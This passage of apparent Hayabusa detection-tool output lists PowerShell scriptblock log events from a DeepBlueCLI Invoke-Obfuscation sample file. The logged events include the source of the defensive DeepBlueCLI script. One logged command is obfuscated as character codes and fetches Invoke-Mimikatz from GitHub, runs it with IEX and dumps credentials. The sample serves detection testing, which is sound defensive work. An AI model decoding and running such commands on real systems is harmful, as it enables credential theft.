c!31i31%34:20i2cJ20!39!39i2c&20J31K31!31:2cJ20l31K31l30K2c:31l31&36J20:2c:31l30K31&2c%31l31:30:20l2c%20!31J31!36l20!2c&20!34K36%2cK20i39:39K2cJ20K31!31i31!20:2c!20!31i30!39%2ci34i37!2cJ20K31:30i39!2c&39J37!20i2ci20&31K31J36l2cl31J31&36K20&2cK20i31l30K35K20i2cJ20%31l30J32i20J2c!31K30i31K2ci31%31%35l2ci20:31i31K36l2cJ20J39&37:20!2ci31l31J36l20J2c%20:31%30&35!20:2ci31&31i31!2cK20l31!31l30!2c!20i34J37J20:2cl20:38:30J2ci31%31!31K20K2c!31J31i39!2ci31&30i31K20!2ci20%31%31l34%20&2c&20J38&33:2c%20!31&31:32K2cK20&31:30:38i2ci20i31l31J31i2cl31l30l35l2c&20&31&31!36%2ci20&34J37%20:2cJ31K30:39J2cK20!39%37&2cK20:31:31&35&2cK20!31%31:36J20%2c!20i31K30K31i20!2c:31%31!34:20K2cl20&34&37i20J2c&20l36l39K20!2ci20J31!32J30K2c!31:30i32&2cJ20i31i30%35!20K2c!31K30l38:20l2c!31!31l36%20%2c!20i31K31&34%2c%20J39%37J2c!20%31l31&36:20%2cl20K31%30%35!2ci31:31i31:2c:31K31%30i20!2cK20i34%37i20!2c:37K33&20:2cJ31&31K30K2c:31!31%38l20%2c:20i31l
31K31%2c%31K30&37:20:2c!20&31&30l31%20l2cl20:34J35%20:2c!37l37J20%2cl31%30&35:2c&31J30%39!2ci20i31:30J35i2c!20%31:30%37%20%2c%20!39K37!20i2c:31i31!36J20:2c&20i31K32J32%2c%20:34%36J2c!31:31i32%2cJ20!31l31&35i20l2cJ20:34:39i2c%20J33&39&20J2cl20i34l31&20:2cK20!35K39l2cJ33K32l20&2c%20!37l33K20:2cK20!31J31:30&20&2ci31:31%38:2c!31K31J31l20!2c!31&30i37!2c!20%31!30%31!20l2ci20&34l35K2cl37:37!2c!20:31i30J35:20&2c!31%30&39J2c%31%30:35&20:2c!20l31:30l37i20!2c:20J39%37%2cJ20:31%31%36K2ci20J31l32:32!2ci33!32!20l2c:34%35K2ci20l36%38l20J2cK20&31i31i37&20&2c!20J31i30:39l2cJ20%31:31i32l2c&36K37i2cl31!31l34l20%2c:31:30&31l2cl31i30&30%20!2c:31l31!35i20:29l7c!66%4f&52l45%61J43l68!2dl4f%62K6aK65:63i74%20:7b!20%28:5bJ49!6e:74i5d!24i5f%20i2di61:53%5bK43K48%41%52&5d:29%20&7d!29J20J29J20!29&20'.split('&K%:Ji!l' )|fOReAcH {( [cONveRt]::tOinT16( ( $_.tOstriNg()),16) -aS [cHar]) }) +""$(SeT-itEM 'VARiable:oFS' ' ') "" )",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:22:22.154 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"{( [cONveRt]::tOinT16( ( $_.tOstriNg()),16) -aS [cHar]) }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:22:22.178 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"&( $eNv:CoMsPEc[4,15,25]-JOin'') ([sTRINg]::JOIn( '', ((73, 69 ,88 ,32, 40 ,78,101,119,45,79 , 98,106 ,101,99,116, 32, 78 ,101 , 116,46 ,87,101 ,98,67, 108,105 , 101, 110 ,116 ,41 ,46, 68, 111, 119 ,110 ,108 ,111, 97, 100, 83 , 116 ,114, 105 ,110,103 ,40 ,39, 104,116 ,116,112, 115 ,58, 47, 47 , 114,97 , 119, 46 , 103,105 , 116, 104 ,117, 98 ,117,115, 101,114 , 99, 111, 110,116 ,101,110 , 116 , 46, 99, 111 , 109,47, 109,97 , 116,116 , 105 , 102 ,101,115, 116, 97 ,116 , 105 ,111, 110, 47 , 80,111 ,119,101 , 114 , 83, 112, 108, 111,105, 116, 47 
,109, 97, 115, 116 , 101 ,114 , 47 , 69 , 120,102, 105 ,108 ,116 , 114, 97, 116 , 105,111,110 , 47 ,73 ,110,118 , 111,107 , 101 , 45 ,77 ,105,109, 105, 107 , 97 ,116 , 122, 46,112, 115 , 49, 39 , 41 , 59,32 , 73 , 110 ,118,111 ,107, 101 , 45,77, 105 ,109,105 , 107 , 97, 116, 122,32 ,45, 68 , 117 , 109, 112,67,114 ,101,100 ,115 )|fOREaCh-Object { ([Int]$_ -aS[CHAR]) }) ) )",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:22:22.178 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{ ([Int]$_ -aS[CHAR]) },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:22:37.530 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.3.ps1 """" powershell",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:22:37.536 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. 
.Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. 
$username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... 
service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ 
$image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" 
{$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:22:37.536 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. 
.Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. 
$username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... 
service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ 
$image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" 
